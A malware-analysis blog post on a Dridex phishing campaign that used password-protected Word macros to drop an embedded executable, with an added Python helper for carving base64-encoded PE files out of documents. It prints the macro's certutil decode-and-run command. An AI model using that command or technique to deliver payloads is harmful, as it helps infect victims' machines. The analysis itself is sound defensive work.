I have seen more than 40k emails sent during a 36-hour window, and I have identified around 300 different samples. The sample sizes are between 260KB and 360KB, and all of them are MS Word documents.
Last week I wrote here about the last Locky campaign and the techniques used by the cyber criminals to fool the victims. Dridex and Locky threat actors are very close friends ;-) and they are sharing some of the TTPs they are using in their campaigns ;-)
Currently, in both cases, they have been sending a blank MS Word document which requires the victim to enable macros.
In the Dridex campaign there are some particularly interesting points.
Debugging the VBA code of the macro, which is password protected, the first interesting thing I see is that the Windows command 'certutil' is used. This command handles digital certificates in Windows.
The command is:
"cmd /c certutil -decode %TMP%\\harakiri.pfx %TMP%\\harakiri.exe & start %TMP%\\harakiri.exe"
Usually PFX files are PKCS#12 containers which store certificates. What's going on?
In this case, the command is not related to digital certificates at all: it is just base64-decoding the content of a file named "harakiri.pfx" and writing the result into an executable named "harakiri.exe". After that, harakiri.exe is executed.
The harakiri.pfx content is inside the MS Word file. Looking into the malicious file, I see a bunch of base64 starting at offset DC80 and ending at offset 56104.
Now, dumping that set of data (from offset DC80 up to offset 56104) and decoding it as base64, the same way the 'certutil' command does, I obtain a PE file. This is the file which is later executed when the macro runs.
The file obtained has already been reported on VirusTotal: https://www.virustotal.com/en/file/08c9b30c7f01dbbc41fb0f11768a15cfe0d68a524acd338eb880e1704575370b/analysis/
This time the VBA inside the MS Office document is not downloading anything from the Internet; it just extracts and decodes the PE file embedded in the document itself.
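The manual step above (dump the byte range, base64-decode it the way certutil -decode does, confirm the result is a PE) written up as a small analysis helper. This is an added example, not code from the original post: the base64-run regex, the is_pe check and the constructed sample document are assumptions of the example, and it also scans a whole file when the offsets are not known in advance.

```python
import base64
import binascii
import re

# A long run of base64 characters, optionally broken by CR/LF as certutil -encode
# writes them. A "-----BEGIN CERTIFICATE-----" header contains '-' and ends a run.
B64_RUN = re.compile(rb'[A-Za-z0-9+/=\r\n]{64,}')

def is_pe(blob):
    """True if blob has an MZ header whose e_lfanew points at the 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b'MZ':
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], 'little')
    return blob[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'

def carve_base64_pe(doc, start=None, end=None):
    """Return [(offset, decoded_bytes)] for each base64 run in doc that decodes to
    a PE file. start/end restrict the search to a known range (such as the post's
    DC80..56104); without a range the whole file is scanned."""
    region = doc[start:end] if start is not None else doc
    base = start or 0
    hits = []
    for m in B64_RUN.finditer(region):
        text = re.sub(rb'\s+', b'', m.group(0))
        text += b'=' * (-len(text) % 4)        # restore padding if it was stripped
        try:
            blob = base64.b64decode(text, validate=True)
        except (binascii.Error, ValueError):   # base64-shaped but not decodable
            continue
        if is_pe(blob):
            hits.append((base + m.start(), blob))
    return hits

def build_sample():
    """Constructed input: a minimal fake PE image (MZ stub plus PE signature, not a
    real binary) encoded as 64-char base64 lines and embedded between junk bytes."""
    pe = bytearray(b'MZ' + b'\x00' * 0x3A + (0x80).to_bytes(4, 'little'))  # e_lfanew = 0x80
    pe += b'\x00' * (0x80 - len(pe)) + b'PE\x00\x00' + b'\x00' * 60
    enc = base64.b64encode(bytes(pe))
    lines = b'\r\n'.join(enc[i:i + 64] for i in range(0, len(enc), 64))
    prefix = b'\x00junk' * 50 + b'\x00'
    doc = prefix + lines + b'\r\n\x00' + b'tail' * 20   # 'tail...' is base64-shaped but not a PE
    return doc, bytes(pe), len(prefix)

if __name__ == '__main__':
    doc, _, _ = build_sample()
    for off, blob in carve_base64_pe(doc):
        print(f'base64-encoded PE at offset 0x{off:X}, {len(blob)} bytes decoded')
```

On a real sample, read the document with open(path, 'rb').read() and hash each carved blob before submitting it to a sandbox or VirusTotal.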
Some IOCs